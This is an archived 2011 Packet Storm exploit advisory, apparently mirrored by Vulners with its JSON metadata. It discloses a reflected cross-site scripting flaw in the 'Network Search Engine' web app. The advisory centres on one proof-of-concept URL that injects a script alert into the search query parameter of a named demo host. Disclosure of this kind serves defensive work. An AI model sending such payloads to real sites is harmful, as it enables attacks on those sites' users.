Search...

Network Search Engine Cross Site Scripting

2011-08-11T00:00:00

ID PACKETSTORM:103895
Type packetstorm
Reporter Izam
Modified 2011-08-11T00:00:00

Description

                                        
                                            `#######################################################################  
# Exploit Title: Network Search Engine  
# Author: Err0r  
# Date: 09.08.2011  
# E-mail: err0riletisim@gmail.com  
# Category: Web App.  
# Note : Warning.  
# DEMO: http://developer.searchnetworkhq.com/demo  
# Price : Free  
# Vuln Type: Reflected XSS  
#######################################################################  
  
[*] ## Exploit ##:  
  
#  
http://developer.searchnetworkhq.com/demo/search.php?action=search_results&query=&lt;script&gt;alert(document.domain)&lt;/script&gt;  
  
  
#######################################################################  
`

JSON Vulners Source

Initial Source

{"reporter": "Izam", "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2016-11-03T10:27:43"}, "dependencies": {"references": [], "modified": "2016-11-03T10:27:43"}, "vulnersScore": -0.2}, "published": "2011-08-11T00:00:00", "cvelist": [], "lastseen": "2016-11-03T10:27:43", "history": [], "id": "PACKETSTORM:103895", "sourceHref": "https://packetstormsecurity.com/files/download/103895/networksearchengine-xss.txt", "objectVersion": "1.2", "sourceData": "`####################################################################### \n# Exploit Title: Network Search Engine \n# Author: Err0r \n# Date: 09.08.2011 \n# E-mail: err0riletisim@gmail.com \n# Category: Web App. \n# Note : Warning. \n# DEMO: http://developer.searchnetworkhq.com/demo \n# Price : Free \n# Vuln Type: Reflected XSS \n####################################################################### \n \n[*] ## Exploit ##: \n \n# \nhttp://developer.searchnetworkhq.com/demo/search.php?action=search_results&query=<script>alert(document.domain)</script> \n \n \n####################################################################### \n`\n", "cvss": {"vector": "NONE", "score": 0.0}, "description": "", "references": [], "edition": 1, "title": "Network Search Engine Cross Site Scripting", "type": "packetstorm", "modified": "2011-08-11T00:00:00", "hash": "7a4a3b591c878fb83a1ce0cca99202940bc21d6443a0ca10aa9a4b8ab069678e", "bulletinFamily": "exploit", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "3556e7583a75e46b45f2b4f81a6ac7ef", "key": "href"}, {"hash": "9510bdde28d224b40d1331d35ccb94bf", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9510bdde28d224b40d1331d35ccb94bf", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "cce7e308093dddd7f5d8f04adc139799", "key": "reporter"}, {"hash": "1bb0df9cc15129f16070e9d11c275375", "key": "sourceData"}, {"hash": "aa06d598896c5a6c645c4700a83d1625", "key": "sourceHref"}, {"hash": "91440ee44f62cae9590417621ffe9238", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}], "href": "https://packetstormsecurity.com/files/103895/Network-Search-Engine-Cross-Site-Scripting.html", "viewCount": 1}